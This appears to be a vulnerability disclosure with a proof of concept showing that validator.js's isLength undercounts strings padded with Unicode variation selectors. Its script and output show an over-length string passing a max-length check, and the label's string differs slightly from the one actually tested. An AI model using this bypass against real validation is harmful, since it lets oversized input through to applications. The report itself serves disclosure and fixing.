JS validator isLength bug

description.txt

The isLength function incorrectly calculates the length of strings containing Unicode variation selectors (\uFE0F, \uFE0E). The flawed logic subtracts all occurrences of these selectors from the total string length, regardless of their position.
According to the Unicode standard, variation selectors are combining characters that should only be considered zero-width if they directly follow a base character to modify its visual representation. When they appear at the beginning of a string or in a sequence, they should be counted as characters.

This flaw allows a malicious actor to bypass the max length constraint by embedding a large number of variation selectors within a string. An application using isLength for input validation could accept strings significantly longer than intended, leading to potential issues like data truncation in databases, buffer overflows in other system components, or DoS.

index.js

const validator = require('validator');

console.log(`Is "test" (String.length: ${'test'.length}) length less than or equal to 3? ${validator.isLength('test', { max: 3 })}`);
console.log(`Is "test" (String.length: ${'test'.length}) length less than or equal to 4? ${validator.isLength('test', { max: 4 })}`);
console.log(`Is "test\uFE0F\uFE0F\uFE0F\uFE0F" (String.length: ${'test\uFE0F\uFE0F\uFE0F\uFE0F'.length}) length less than or equal to 4? ${validator.isLength('test\uFE0F\uFE0F\uFE0F', { max: 4 })}`);

output.txt

Is "test" (String.length: 4) length less than or equal to 3? false
Is "test" (String.length: 4) length less than or equal to 4? true
Is "test️️️️" (String.length: 8) length less than or equal to 4? true

package.json

{
  "name": "poc",
  "version": "1.0.0",
  "description": "",
  "main": "index.js",
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1"
  },
  "keywords": [],
  "author": "",
  "license": "ISC",
  "type": "commonjs",
  "dependencies": {
    "validator": "^13.15.15"
  }
}